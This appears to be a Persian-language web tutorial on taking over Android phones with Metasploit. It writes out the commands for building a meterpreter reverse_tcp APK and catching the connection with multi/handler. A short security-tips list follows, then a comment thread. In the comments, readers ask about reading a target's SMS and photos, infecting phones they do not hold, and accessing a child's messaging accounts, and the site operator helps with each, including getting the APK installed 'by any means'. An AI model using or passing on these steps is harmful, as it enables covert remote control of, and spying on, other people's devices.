در این اموزش به نحوه هک اندروید با استفاده از کالی لینوکس میپردازیم و روش های امنیت در مقابل این روش را اموزش میدهیم
در این اموزش هک و امنیت با ما همراه باشید
هک اندروید و امنیت
توضیحات درباره هک اندروید
سیستم عامل اندروید یکی از OS های محبوب در کل دنیا است که روزانه افراد بسیاری از ان استفاده میکنند
این OS برای دستگاه های موبایل طراحی شده است اما امکان نصب ان در هر سیستمی وجود دارد
به همین دلیل محبوبیت بسیاری دارد و افراد زیادی در ایران و دنیا از ان استفاده میکنند
در این اموزش با روش های تست نفوذ اندروید از طریق کالی لینوکس و فریمورک متاسپلویت اشنا میشویم و به طور کامل با آن کار خواهیم کرد
متاسپلویت
متاسپلویت یک فریمورک قدرتمند تست نفوذ است که در اموزش متاسپلویت توضیحات کاملی را درباره ان خدمت شما عزیزان ارائه دادیم
اما به طور خلاصه ابزاری است که در هر سیستم عاملی از جمله ویندوز قابل نصب است و به طور پیشفرض در کالی لینوکس وجود دارد
و علت محبوبیت بسیار زیاد ان بزرگ بودن ان و استفاده از اکسپلویت ها و پیلود متنوع درون خود است
و ما در این اموزش با استفاده از یکی از پیلود های ان یک فایل برای تست امنیت یا هک اندروید خواهیم ساخت و ان را اجرا میکنیم
اموزش ویدیو ای هک اندروید و امنیت
اموزش تست نفوذ اندروید
در ابتدا با دستور زیر وارد متاسپلویت شوید
msfconsole
بعد از کمی انتظار و باز شدن متا دستور زیر را برای تنظیم و ساخت apk وارد کنید
use android/meterpreter/reverse_tcp
حال تنظیمات مربوط به این پیلود را انجام دهید برای تنظیم ای پی دستور زیر را با ای پی خود وارد کنید
set LHOST 127.0.0.1
و یک پورت را برای اتصال انتخاب کنید برای مثال ما پورت ۶۰۶۰ را استفاده میکنیم
set LPORT 6060
حال برای ساخت فایل اصلی هک اندروید که باید در اندروید نصب شود دستور زیر را وارد کنید
generate -f raw -o PentestCore.apk
دستور زیر را برای ایجاد اتصال بین پیلود وارد کنید
use multi/handler
و پیلود ساخته شده را ست نمایید ادرس پیلود در واقع ادرسی است که در دستور اول وارد کرده ایم
set PAYLOAD android/meterpreter/reverse_tcp
مجدد تنظیمات ای پی و پورت را مانند قبل انجام دهید دقت داشته باشید که تفاوتی بین ان ها نباشد
و در اخر برای اجرای کافیست دستور exploit را وارد کنید و تا نصب اپ اندروید ساخته شده منتظر بمانید
بعد از نصب سریعا و اجرا برنامه اتصال برقرار خواهد شد و دسترسی meterpreter به شما اده خواهد شد
و میتوانید دستورات خود را در سیستم عامل اندروید قربانی اجرا کنید یا از امکانات متاسپلویت برای ان استفاده کنید
در صورتی که اندروید هدف روت شده باشد یعنی به بالا ترین سطح دسترسی رسیده باشد شما هم این دسترسی را خواهید داشت
و اطلاعات حساس و هسته اندروید دسترسی خواهید داشت که امکانات بسیار زیادی را در اختیار شما خواهد گزاشت
آموزش امنیت و جلوگیری از هک اندروید
- برای امنیت در سیستم عامل اندروید روش های بسیاری وجود دارد
- از انتی ویروس های اورجینال اندرویدی استفاده کنید
- از نصب برنامه های نامعتبر و کرک شده خود داری کنید
- از دریافت برنامه به غیر از پلی استور خود داری کنید
- بر روی هر ینکی کلیک نکنید و وارد وبسایت های نامعتبر نشوید
- از انتی ویروس های فعال استفاده کنید که با نصب هر برنامه ان را اسکن کند
- دیتا های اصلی خود را در موبایل نگه داری نکنید تا درصورت هک اندروید نگرانی زیادی نداشته باشید
- پسورد مناسب قرار دهید تا درصورت در دسترس قرار گرفتن فیزیکی موبایل مورد نفوذ قرار نگیرد
دانلود ویدیو اموزشی
امید واریم از این اموزش هک اندروید و امنیت لذت برده باشید
چناتنچه سوال یا پیشنهادی دارید از بخش نظرات در اخر همین صفحه ارسال کنید و در کوتا ترین زمان پاسخ داده خواهد شد
پایدار باشید.
ثبت دیدگاه
- دیدگاه های ارسال شده توسط شما، پس از تایید توسط تیم مدیریت در وب منتشر خواهد شد.
- پیام هایی که حاوی تهمت یا افترا باشد منتشر نخواهد شد.
- پیام هایی که به غیر از زبان فارسی یا غیر مرتبط باشد منتشر نخواهد شد.
چطور با این برنامه به عکس و فیلم های شخص دسترسی داشته باشیم
بعد از گرفتن دسترسی میتوانید دستورات خود را اجرا کنید و هر کاری که نیاز دارید انجام بدین
عالیه
ای پی که میگه منظورش چیه دقیقن؟
و به جا ای پی میشه بهش ادرس ایمیل یا تلگرام بدم که اطلاعاتش واسم بیاد؟!
این اموزش برای ساخت پلود Apk است و تست نفوذ با استفاده از فایل Apk میباشد
در بخش ای پی یا ip باید ip سرور برای اتصال کلاینت را وارد کنید
سلام ببخشید من مودمم dlink DWM سیمکارت خور فلاشی هستش ولی زمانی که ایف کانفیگ رو برای \یدا کردن ایبی خودم میزنم در قسمت اول هیچ ایبی ندارم .وقتی هم تو ایرنترنت برس و جو کردم گفتند باید بورت فرواردینگ رو درست کنم و اینا ولی بازم به چیزی نرسیدم و نتوستم از متاسبلویت استفاده کنم اگه میشه راهنمایی کنید ممنون
بهتر است برای تست نفوذ از سرور های مجازی کالی لینوکس استفاده نمایید که امنیت بیشتری داشته باشید و نیازی به پورت فورواردینگ نداشته باشید
در صورتی که میخواهید از طریق سیستم خود انجام دهید در بخش جستجو پورت فورواردینگ را جستجو نمایید و اموزش مورد نظر را مشاهده کنید
سلام خسته نباشید
خوب ما بخوایم مثلا به یه گوشی متصل شیم اونوقت باید چجوری به اون گوشی که مده نظرمونه متصل شیم یعنی بدون اینکه گوشی دسته ما باشه میشه اینکارو کرد؟
درود تشکر
باید فایل apk که ساخته اید را به هر طریقی در سیستم اندرویدی که میخواهید دسترسی داشته باشید نصب نمایید
اقا من بخام به اسم ام اس هاش دسترسی پیدا کنم باید چیکار کنم؟
بعدش که اونو اجرا کرد
چجوری بهش دسترسی پیدا کنم؟
اس ام اسو میگم
درود
با زدن help میتوانید نحوه استفاده از متاسپلویت را مشاهده کنید درصورت امکان اموزشی جداگانه برای نحوه کارکرد متاسپلویت قرار خواهیم داد موفق باشید
سلام
ای پی که باید بزنیمو از کجا بدونیم چیه
درود
از سرور مجازی استفاده کنید هنگام خرید ای پی به شما داده میشود و یا میتوانید ای پی خود را با دستور ifconfig مشاهده نمایید
ببخشید من با vmware
داخل لینوکس شدم رمشم بالای یک گیگ گزاشتم بازم هنگ میکنه چیکار کنم؟
مقدار cpu اختصاص داده شده را بالا ببرید و مقدار رم را در سیستم عادلانه تقسیم کنید و بیشتر از منابع واقعی سیستم نزارید
من با cmd دستور ipconfig زدم دو تا ایپی زده بود یکی مال سیستم یکی مال vmware کدومو باید بزنم
بعد این ایپی هارو باید توی مودم هم port forwarding کنم یا نیازی نیس ؟
از داخل کالی لینوکس ifconfig بزنید و ای پی خود را مشاهده کنید اموزش پورت فورواردینگ هم در سایت جستجو نمایید و مشاهده کنید
با سلام و خسته نباشید
میخاستم بگم که من همه کار هارو انجام دادم برنامرم رو نصب کردم و اجرا کردم
ولی توی ترمینال چیزی نمیاد فقط مینویسه که
started revers tcp handler on 192.168.28.131:3030
چیکار کنم؟؟؟
درود و تشکر
شما مشکل در شبکه خود دارید درصورتی که از مجازی ساز ها استفاده میکنید network را بر روی NAT بگذارید و ای پی خود را درست وارد کنید و دقت داشته باشید دستگاه اندروید به شبکه داخلی یا خارجی شما متصل باشد
ببخشید ولی شبکه داخلی یا خارجی یعنی ب مودم من وصل باشه؟
شبکه داخلی زمانی است که مودم شما یک شبکه NAT ایجاد کرده باشد و شما در داخل یک شبکه خانگی قرار دارید و فقط میتوانید ارتباط بین دستگاه های متصل به ان شبکه برقرار کنید
شبکه خارجی شبکه بیرونی اینترنت است که هر زمان به اینترنت وصل باشید میتوانید به دستگاه متصل شوید و ازتباط از طریق شبکه جهانی اینترنت برقرار است
سلام ببخشید من برنامه رو ساختم ولی مجبور شدم از ترمینال خارج بشم و سیستم رو خاموش کنم الان که روشن کردم هر چی میزنم exploit چیزی نمیاد لطفا راهنماییم کنید خیلی مهمه.اگه میشه بفرستید به ایمیلم جواب مشکل رو
درود
در شبکه داخلی شما با خاموش و رشن شدن سیستم ممکن است ای پی ها در هر دستگاه تغیر کند و برای ثابت بودن کلاینت باید از no ip یا سرور مجازی استفاده نمایید که اموزش ها در سایت موجود است
دوتا مشکل دارم
اولیش: برای ثابت بودن ایپی ، چطور میشه از noip در متاسپلویت استفاده کرد؟ ( نحوه استفاده اش برای رات های اماده رو بلدم ولی برای متاسپلویت نه، اگه میتونی ی اموزش کوتاه براش بذار)
دومیش:برای هک در ماشین مجازی،بعد از port forwarding حتما باید فایروال سیستم هم غیرفعال بشه؟ اگه اره، تو کالی لینوکس چطور باید این کار رو کرد؟؟؟
درود
اموزش no ip در سایت قرار دارد و در صورت امکان برای متاسپلویت هم قرار خواهد گرفت
سلام
لطفا به من بگید چجوری پیلود رو transportکنم رو برنامه ی سیستمی؟؟؟؟
درود
این موضوع مبحث جداگانه ای دارد که بزودی اموزش ان قرار میگیرد و با دنبال کردن اموزش های PentestCore میتوانید از ان مطلع شوید
در صورت خارج شدن دوباره چجوری میتونیم به این قسمت دسترسی داشته باشیم
درود
با هر بار وارد شدن به حساب کاربری خود میتوانید به این اموزش دسترسی داشته باشید
من دسترسی گرفتم لطفا دستورات عملی دسترسی به همه ی نقاط اندروید رو هم بذارید ممنون میشم
درود
مستوانید سویچ های راهنمارا مشاهده کنید
بزودی اموزشی برای نحوه کنترل اندروید با این روش را قرار میدهیم
سلام
من این ارور هارو دارم لطفا راهنماییم کنید
[-] Handler failed to bind to 192.168.1.103:443:- –
[-] Handler failed to bind to 0.0.0.0:443:- –
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:443).
درود
مشکلی در تنظیمات وجود دارد مجدد طبق اموزش پیش بروید
سلام . من دستور generate -t raw -f ex.apk رو میزنم
بجای ساخت برنامه برام آپشن ها و توضیحات سویچر هارو میاره که t جزشون نیس
باید سویچ دیگه ای رو بزنم؟
ا
درود
دستورات را کپی نکنید دستی وارد کنید بدون مشکل اجرا میشوند
احتمالا مشکل شما به دلیل کپی کردن دستورات بئده است
سلام شما برای دستیابی به تلگرام واینیستاگرام فرزندمون چه چیزیو پیشنهاد میکنید چه دوره ای رو
درود
در دوره اموزشی کالی لینوکس روش های کنترل موبایل به صورت کامل گفته شده میتوانید از ان استفاده کنید
برای مشاهده دوره های اموزشی از منو به بخش دوره ها مراجعه کنید
سلام اقا من میخوام اموزش ببینم و بینهایت علاقه دارم و هیچکسو نمیشناسم اموزشم بده فقط تو سایت ها خوندم و رو گوشی تبلتم لینوکس دیپلوی رو نصب کردم همین دگه کاری بلد نیستم
درود
شما میتوانید در دوره های اموزشی ما شرکت کنید و از مباحث پایه تا پیشرفته اموزش ببینید
سلام من دستورت رو دستی وارد میکنم در نهایت فایل رو نمیسازه
و اپشن ها رو توضیح میده و سویچ t-بینشون نیست
و تو دستور f- ..ا پی کی رو نوشته ساپورت نمیکنه هر چیزی هم که در توضیحاتش بود فایلشو نساخت
اخرین نسخه کاای ۱.۲۰۱۹
متااسپلویت ورژن ۵.۰.۲هم هست
ممنون
و تشکر
و سپاس بخاطر اموزشهاتون و وقتی که برای ما گذاشتید
درود
در نسخه جدید یعنی ورژن ۵ متاسپلویت کمی بعضی از سویچ ها تغیر کرده اند
برای انجام تست نفوذ از روش این اموزش باید از نسخه های قبل از ۵ استفاده کنید
بزودی اموزش های دیگری با استفاده از متاسپلویت ۵ قرار خواهیم داد
موفق باشید
سلام وقتتون بخیر بنده exploit رو که میزنم و بعد اون هدفم اپلیکیشن رو نصب میکنه ولی بعد از چند ثانیه دستور died میده و باید دوباره من exploit کنم و هدفم هم دوباره رو اپ کلیک کنه تا من دوباره دسترسی داشته باشم به گوشیش برای اینکه این اتفاق نیافته باید چکار کنم ممنون میشم راهنمایی کنید
درود
بله در بعضی از دستگاه ها ممکن است مشکلات به این صورت به وجود اید میتوانید پبلود های دیگر اندروید را در دستگاه مورد نظر تست کنید یا از رات ها استفاده کنید که اموزش های ان ها در سایت موجود است و با جستجو میتوانید مشاهده کنید
سلام من روی وی ام کالی دارم با اون بسازم میتونم ای پی وی پی اس مو ک ویندوز سرور روش نصبه رو بدم بعد چجوری از روی وی پی اس وصل شم ؟ یا کلا متااسپلویت رو روی ویندوز سرور روی وی پی اس نصب کنم همونجا بسازم؟
درود
بله باید ای پی سرور کجازیتونو بدید و از داخل سرور مجازی ان را کنترل کنید
بهتره از سرور مجازی کالی لینوکس استفاده کنید اما میتوانید در ویندوز هم متاسپلویت را نصب کنید و این کار را انجام دهید
برای تهیه سرور مجازی به سایت اول سرور مراجعه کنید
موفق باشید
سلام ببخشید من پیلود که درست میکنم فقط روی همون دستگاهی که باهاش ساختم نصب کنم کار میکنه روی مبایل دیگم نصب کردم هرچی کلیک میکنه روی ویروس هیچ اتفاقی داخل مولتی هندلر نمی افته انگار کسی روش کلیک نکرده مشکل چیه
درود احتمالا مشکل از شبکه و ip داخلی شما است باید از ای پی ثابت استفاده کنید که چند راه وجود دارد ۱- از پورت فورواردینگ و no ip استفاده کنید ۲- سرور مجازی تهیه کنید و به صورت امن و بدون دردسر از این روش استفاده کنید
سلام لطفا یه اموزش بزارید که ازvps چطور استفاده کنیم وقتی داخل متا اکسپلویت میکنم روی vps بایند نمیشه فقط ایپی خودشو قبول میکنه
درود
اگر سرور مجازی کالی لینوکس تهیه کرده باشید با همین دستورات میتوانید به راحتی apk را بسازید فقط کافیست در هنگام ست کردن ip , ip سرور خود را بدهید
سلام ببخشید این پورت فورواردینگ که با سایتserveo.net روی مبایل انجام میدن امن هست یا این ردیابی میشه
درود
سایت های زیادی برای این کار هستند اما به صورت کلی روش پورت فورواردینگ با استفاده از این وبسایت ها ،به راحتی ای پی اصلی شما را در اختیار میگذارد
باسلام
من یک چیزی را متوجه نشدم
الان من در ویندوز لپ تاپم Vmware نصب کردم و روی اون Vmware کالی لینوکس نصب کردم
حالا برای قضیه ip ثابت باید دقیقا چیکار کنم؟
اینکه سرور مجازی بخرم و همون ip رو در کالی(که روی Vmهست) بجای ip وارد کنم کافیه؟
یا باید پورت فورواردینگ هم بکنم؟ (اگه اره چجوری ؟؟؟)
یا باید کلا کالی رو جای دیگه ای نصب کنم؟؟
لطفا کامل و به زبان ساده بگید من مبتدی هستم 🙂
ممنون
درود
در صورت تهیه سرور مجازی داخل همان سرور باید تمامی کار ها را انجام دهید و از داخل همان ، دستگاه مورد نظر را کنترل نمایید
اگر میخواهید در مجازی ساز سیستم خانگی خود اینکار را انجام دهید اموزش پورت فورواردینگ و noip را در سایت جستجو و مشاهده کنید
سلام بعد از دستور ساخت فایل apk فایل را نمیسازد !
درود در نسخه جدید کمی تغیرات ایجاد شده است که در اموزش بزودی اضافه میکنیم یا میتوانید از سویچ help تغیرات را مشاهده کنید
در صورتی که نتوانستید بسازید میتوانید نسخه قدیمی تر هم استفاده کنید
ایا میشه بدون سرور کارشو انجام داد؟
درود بله اما باید DNS ثابت بگیرید و پورت فورواردینگ انجام دهید
سلام وقت بخیر.من یک vm دارم و کالی رو روی ان نصب کردم و با هات اسپات اینترنت گرفتم .exploit که میخواد نصب بشه فقط دو دستور اول میاد و دیگه اتفاقی نمیفته با این حال فایل رو روی گوشی میخواستمنصب کنم نصب نمیشد مشکل کجاست ؟؟؟؟
درود
نسخه های خیلی قدیمی اندروید پشتیبانی نمیشود یا مراحلی از اموزش را به درستی انجام نداده اید مجدد برسی کنید یا ارور را ارسال کنید
سلام.با پایتون میشه انجام داد?
درود
پایتون یک زبان برنامه نویسی است که در صورتی که بلد باشید میتوانید ابزاری مشابه بنویسید به زبان پایتون و استفاده کنید
سلام من دستور generate رو وارد میکنم میره تنظیمات دستور رو میاره
درود
تغیراتی در سویچ های نسخه جدید ایجاد شده است که پست بروز شده و میتوانید مجدد تست کنید